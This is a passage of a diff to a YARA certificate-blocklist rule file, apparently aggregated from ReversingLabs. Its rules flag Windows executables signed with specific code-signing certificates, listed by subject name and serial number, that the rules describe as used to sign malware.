"2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16436-L16454" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10570-L10586" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f" score = 75 quality = 90 tags = "INFO, FILE" @@ -22887,22 +42678,22 @@ rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADVANCED ACCESS SERVICES LTD" and (pe.signatures[i].serial=="00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures[i].serial=="ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee") and 1650931200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Walden Intertech Inc." and pe.signatures[i].serial=="05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0f9fa6c6-372d-5948-94ba-9e3fee956647" + id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16456-L16472" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10588-L10604" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6" score = 75 quality = 90 tags = "INFO, FILE" @@ -22912,22 +42703,22 @@ rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALISA LTD" and pe.signatures[i].serial=="5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Emurasoft, Inc." and pe.signatures[i].serial=="2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31" + id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16474-L16490" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10606-L10622" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72" score = 75 quality = 90 tags = "INFO, FILE" @@ -22937,22 +42728,22 @@ rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Enforcer Srl" and pe.signatures[i].serial=="30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0" + id = "ab274ae3-0884-517a-a221-2c952fc9d74c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16492-L16508" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10624-L10642" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3" score = 75 quality = 90 tags = "INFO, FILE" @@ -22962,22 +42753,22 @@ rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Theravada Solutions Ltd" and pe.signatures[i].serial=="02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VERIFIED SOFTWARE LLC" and (pe.signatures[i].serial=="00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures[i].serial=="b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca") and 1595462400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64350364-fe74-54df-886d-1197146e00e7" + id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16510-L16526" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10644-L10660" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed" score = 75 quality = 90 tags = "INFO, FILE" @@ -22987,22 +42778,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Toliz Info Tech Solutions INC." and pe.signatures[i].serial=="05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c" + id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16528-L16544" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10662-L10678" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e" score = 75 quality = 90 tags = "INFO, FILE" @@ -23012,22 +42803,22 @@ rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ROSSO INDEX K.K." and pe.signatures[i].serial=="01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "exxon.com" and pe.signatures[i].serial=="0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "aeb10a64-633c-5fc6-87af-360e1a402ad4" + id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16546-L16562" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10680-L10696" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959" score = 75 quality = 90 tags = "INFO, FILE" @@ -23037,22 +42828,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures[i].serial=="1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d" + id = "d873b0d4-dff5-5ee2-a70f-b067602b217e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16564-L16580" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10698-L10714" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752" score = 75 quality = 90 tags = "INFO, FILE" @@ -23062,22 +42853,22 @@ rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures[i].serial=="26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "66025c6e-5d85-5660-87f1-3094a536bbe2" + id = "44c878ab-75b2-5cd3-a019-94982a508e0f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16582-L16598" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10716-L10732" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0" score = 75 quality = 90 tags = "INFO, FILE" @@ -23087,22 +42878,22 @@ rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Divisible Limited" and pe.signatures[i].serial=="6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aarav Consulting Inc." and pe.signatures[i].serial=="0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1" + id = "ef29c813-e914-5766-990f-76c14d18ec79" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16600-L16616" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10734-L10750" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f" score = 75 quality = 90 tags = "INFO, FILE" @@ -23112,22 +42903,22 @@ rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sivi Technology Limited" and pe.signatures[i].serial=="21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures[i].serial=="1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9fa41321-9736-5e67-b561-005b6d893e3f" + id = "51c596cd-3033-51ef-914f-310d2bbfbd5f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16618-L16634" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10752-L10768" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3" score = 75 quality = 90 tags = "INFO, FILE" @@ -23137,22 +42928,22 @@ rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GIN-Konsalt" and pe.signatures[i].serial=="73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures[i].serial=="5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "559dc522-bc23-5716-b8ad-9e9df102936b" + id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16636-L16652" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10770-L10786" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52" score = 75 quality = 90 tags = "INFO, FILE" @@ -23162,22 +42953,22 @@ rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures[i].serial=="58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9" + id = "eb06576e-11ea-58ba-aa19-68c161f6aa68" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16654-L16670" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10788-L10804" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a" score = 75 quality = 90 tags = "INFO, FILE" @@ -23187,22 +42978,22 @@ rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures[i].serial=="25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c3a18989-239e-56d7-b1c2-92895c02b7d8" + id = "9158c9a5-37fc-54bc-9601-3aa347a421ab" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16672-L16688" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10806-L10822" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1" score = 75 quality = 90 tags = "INFO, FILE" @@ -23212,22 +43003,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures[i].serial=="2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures[i].serial=="12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c" + id = "1e76a088-b0f2-54d6-b730-77552c74d7bd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 